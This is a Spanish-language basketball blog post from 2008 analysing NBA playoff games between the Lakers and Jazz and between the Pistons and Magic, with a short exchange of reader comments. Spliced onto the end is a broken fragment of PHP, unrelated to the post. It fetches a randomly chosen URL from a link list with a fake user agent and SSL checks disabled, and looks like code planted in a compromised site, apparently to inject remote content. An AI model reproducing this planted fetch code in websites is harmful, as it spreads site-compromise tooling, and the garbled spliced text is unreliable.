Exquisitez a cara de perro

08 de May de 2008 por txusma

By TheDeerHunter & Txusma

Exquisitez a cara de perro (UTA 110 – LAL 120)

Duelo de “alto standing” anoche en el Staples: Alta anotación, intensidad defensiva, variantes tácticas, jugadas excepcionales, estrellas rutilantes, igualdad y emoción. ¿Qué más se puede pedir? Un equipo hace 30ptos por cuarto con altísimos porcentajes de tiro y el otro es todavía capaz de discutirle el partido. Sencillamente increíble. Parece que los dos equipos se pusieron de acuerdo para estar al altura del premio que se entregó anoche.

El partido tuvo un desarrollo similar al primero, pero planteamientos completamente diferentes. De entrada, Kobe, con el MVP en el bolsillo, no abusó tanto de su propia superioridad individual y buscó más juego para sus compañeros, en esta ocasión encontrándolos. Kobe contemporizó sus aportaciones y aún tuvo margen de mejora para apretar el acelerador cuando Sloan le apretó en defensa con la “variante Kirilenko”. El ruso lo hizo muy bien, pero de momento nada está siendo suficiente para parar al excepcional escolta, que logra encontrar de mil maneras distintas la mejor opción en cada momento. Con las increíbles jugadas que dibujó anoche parece imposible que nadie pueda pararle.

Los Lakers han asumido que durante esta eliminatoria sufrirán en el rebote, sobre todo el defensivo, aunque anoche mostraron recursos para minimizar el problema. De entrada, la agresividad con que Pau y Odom buscaron el aro frente a la pasividad del primer día, provocó un importante desgaste en defensa al juego interior de Utah, precísamente donde más les duele. La primera consecuencia fue que Boozer apenas pudo jugar durante la primera parte por problemas de faltas y, aunque Millsap le sustituyó con un gran acierto, Okur no logró complementarse con él tanto como con el de Duke y se disipó bastante. Odom les castigó continuamente con penetraciones buscando falta o canasta fácil. Los problemas de faltas se están antojando decisivos en esta eliminatoria en contra de Utah. Además, Phill Jackson planteó cambios constantes en los emparejamientos en defensa interior. Esto terminó de marear ese típico juego exterior-interior que plantean los hombres altos de los de Sloan y finalmente los Lakers pudo cerrarse algo más en rebote, bajando la sangría que sufrió el primer día a tan sólo 4 rebotes de diferencia. Además, al minimizar la amenaza exterior la defensa se cerró sobre Gasol, que por un día se infló a dar tapones.

Otro duelo precioso fue el de Fisher contra Deron Williams. Durante la primera parte el base angelino llegó a aburrir a su ex-compañero. En la segunda, por casta, talento, velocidad y acierto, Williams mantuvo a su equipo en el partido. Esa será precísamente la gran baza de Utah: sea como sea el partido va a ser difícil que este equipo baje los brazos.

Grandísimo partido también de los reservas de ambos equipos. En esta ocasión ganó la batalla el banquillo de Utah, con un espectacular Millsap y un incisivo Korver contra un destacado Vujacic (como casi siempre) por parte de L.A.

En definitiva mucha igualdad y espadas en todo lo alto para viajar al fortín de la ciudad mormona. Ahora empieza lo verdaderamente difícil para los amarillos.

Lesión inoportuna (DET 86 – ORL 111)

Un gran primer y último cuarto bastó a Orlando para vencer a un Detroit que no pudo sobreponerse a la temprana lesión de rodilla de Chauncey Billups. Los Magic demostraron que la eliminatoria no está ni mucho menos decidida y que pueden dar mucha guerra a uno de los grandes favoritos del Este. Rashard Lewis (que ayer anotó 33 puntos) mejoró considerablemente su aportación respecto los 2 primeros partidos y se antoja fundamental en el devenir de una eliminatoria en la que el jugador más destacado sigue siendo Dwight Howard (20 puntos, 12 rebotes y 6 tapones). En todo caso, la franquicia de Florida sigue confiando en su juego dentro – fuera con Howard martilleando la zona rival y sacando balones para que desde la línea de 3 sus compañeros claven los triples. En este esquema de juego y teniendo en cuenta que la aportación de Howard es casi segura, el acierto desde más allá de los 7 metros es clave y la única oportunidad que tiene Orlando de dar la sorpresa.

Por parte de los Pistons hay que destacar a un Rodney Stuckey que suplió con garantias a Billups, del que no se conoce aún el alcance exacto de la lesión, sobretodo en el aspecto anotador aunque se notó en varios momentos su inexperiencia. Si la lesión de Billups es relativamente grave y no puede volver a jugar en la serie, las opciones de los Pistons descienden drásticamente a pesar del buen partido ayer de Hamilton y Prince. Se confirma pues que queda mucha serie y mucho por decidir.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Si los Lakers ganan de 10 en el tercer partido de la serie diremos que lo dificil empieza en el 4º partido o en la final de conferencia? Lo dificil ya ha empezado y los Lakers están respondiendo.

      Citar

  2. TheDeerHunter dice:
    #2

    Diremos que empieza en la final de conferencia 😀

    Lakers de momento, han aguantado su factor cancha. Eso está bien.
    Peor hubiera estado si no lo hubieran logrado.

    En Salt Lake la dificultad aumenta ¿o no lo crees así??

      Citar

  3. Viva_Dirk dice:
    #3

    Si lo creo, pero no creo que empiece lo dificil, lo dificil ha empezado hace 2 partidos, lo que pasa es que como se han ganado con relativa comodidad no parece que Utah fuera de casa sea peligroso.

      Citar

  4. TheDeerHunter dice:
    #4

    En realidad, no estoy tratando de menospreciar a Utah… todo lo contrario. He defendido lo difíciles que son y el respeto que les tengo.

    Lo de que lo difícil ha empezado hace 2 partidos… es cierto. Pero lo <> difícil de Utah viene ahora.
    En casa tienen un balance de 37-4. Fuera de casa tan sólo un flojo 17-24… no sé porqué será, pero está más que demostrado que son infinitamente más fuertes en su casa. De hecho, podríamos calificar de categoría de proeza ganarles allí.
    Muchos analistas daban un 4-3 a favor de Lakers. Esto es porque ya de entrada se partía de la base que LA lo va a tener más que chungo para rematar la faena fuera y el pronóstico se basaba en que lograran amarrar los partidos de casa. De momento es precísamente lo que han hecho.
    Ahora bien, sabemos que son capaces de ganarles allí, de hecho ya lo hicieron en la regular y sin Gasol(aunque nadie piense que va a ser lo mismo) aunque veremos cómo es de capaz Utah de manejar su propia ansiedad, porque si pierden uno de los próximos dos estarán perdidos.

    No seamos inocentes. Utah sólo nos ha enseñado un poquito de lo mucho que puede hacer sufrir a Lakers.

      Citar

  5. Viva_Dirk dice:
    #5

    Ya les ha ganado Houston un partido en estos Play-Offs, de ahí que tenga un pelín mas de confianza en que ganemos uno de ellos(si es que no son los 2, jojo).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>